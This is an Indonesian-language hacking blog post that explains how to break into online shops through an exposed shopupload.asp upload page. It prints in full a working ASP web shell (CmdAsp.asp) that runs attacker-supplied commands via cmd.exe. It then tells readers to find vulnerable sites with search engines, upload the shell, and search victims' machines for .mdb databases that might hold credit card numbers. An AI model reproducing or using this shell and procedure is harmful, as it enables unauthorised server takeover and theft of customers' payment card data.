Hmmm, sebelumnya mungkin penulis harus berterima kasih dulu kepada
kawan penulis Co_BaiN yang telah mengajarkan penulis tentang hal ini dan
kemudian mulai penulis kembangkan sendiri mengenai teknik ini berdasarkan
buku “WEB HACKING” karangan Stuart McClure ,Saumil Shah dan Shreeraj
shah ☺☺☺.
Sebenarnya teknik ini mudah banget lho, gak percaya ??? Bahkan hampir
semudah semudah copy-paste di bug web folder ☺ hanya saya di sini ada
dituntut untuk memahami command-command DOS (no unix command here !!!)
lebih banyak, atau paling tidak sedikitlah.
Hmm... mungkin ada yang harus penulis ingatkan, walau judul artikel kali ini
adalah “HACK WEBSITE SHOPPING WITH shopupload.ASP” tetapi menulis
tidak ingin membahas bagaimana mencari Credit Card di sini, karena apa ???
38
Yah, karena penulis sendiri cenderung malas untuk mencari cc sendiri, mending
minta pasteannya aja ama kawan :P~ prĂȘt !!!
Nah, lalu bagaimana langkah selanjutnya ????
Langkah pertama adalah silahkan copy-kan script ASP yang penulis dapatkan
dari site securiteam.com berikut ini lalu di save dengan nama terserah anda yang
penting ekstensinya adalah asp, sebagai contoh anda simpan saja script ASP ini
dengan nama beben.asp :
---------------------=[ cut here the code ]=---------------------
<%@ Language=VBScript %>
<% ' --------------------o0o-------------------- ' File: CmdAsp.asp ' Author: Maceo
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <% If (IsObject(oFile)) Then ' -- Read the output from our command and remove the temp file -- ' On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %> <-- CmdAsp.asp --> ---------------------=[ cut here the code ]=--------------------- Oh iya hampir lupa, langkah selanjutnya yah ??? hmmm anda bisa mencari target di google atau di search engine kesayangan anda, terus masukkan keywords yang kira-kira akan mengarahkan anda ke web yang memiliki file shopupload.asp (penulis tak sengaja menemukannya ketika mencoba-coba mencari shopdbtest.asp kemudia ketika penulis menghapus nama file shopdbtest.asp eh ternyata tuh site bisa di browsing directory, nah kemudian penulis menemukan file shopupload.asp ini :P~ ) Nah, setelah menemukan file tersebut, sekarang anda bisa mengupload file kesayangan anda ke target ☺☺☺ dan dalam contoh kali ini kita akan mengcopy file beben.asp yang berisi file-file jahat untuk mengeksekusi comamnd-command di target ☺☺☺ dan alngkah selanjutnya adalah hak anda tersendiri untuk 40 melakukannya. Hm... jika anda ingin mencari cc di target, silahkan aja anda ketik command berikut : Dir *.mdb /s Command itu berguna untuk mencari file-file yang berekstensi .mdb di seluruh pc korban, siapa tau ada beberapa file menarik yang berisi cc di dalamnya. Lalu untuk men-downloadnya, hehehe... silahkan cari sendiri caranya, penulis gak mau ikutan dapat dosa kolektif atas penyalahgunaan cc yang anda dapat tersebut ☺☺☺
Do you like this article? Share It!
0 komentar to "Hack Website Shopping With shopupload.asp"
Tukar Link
Mau Tukar Link? Copy/paste code HTML berikut ke blog kamu
Posting Komentar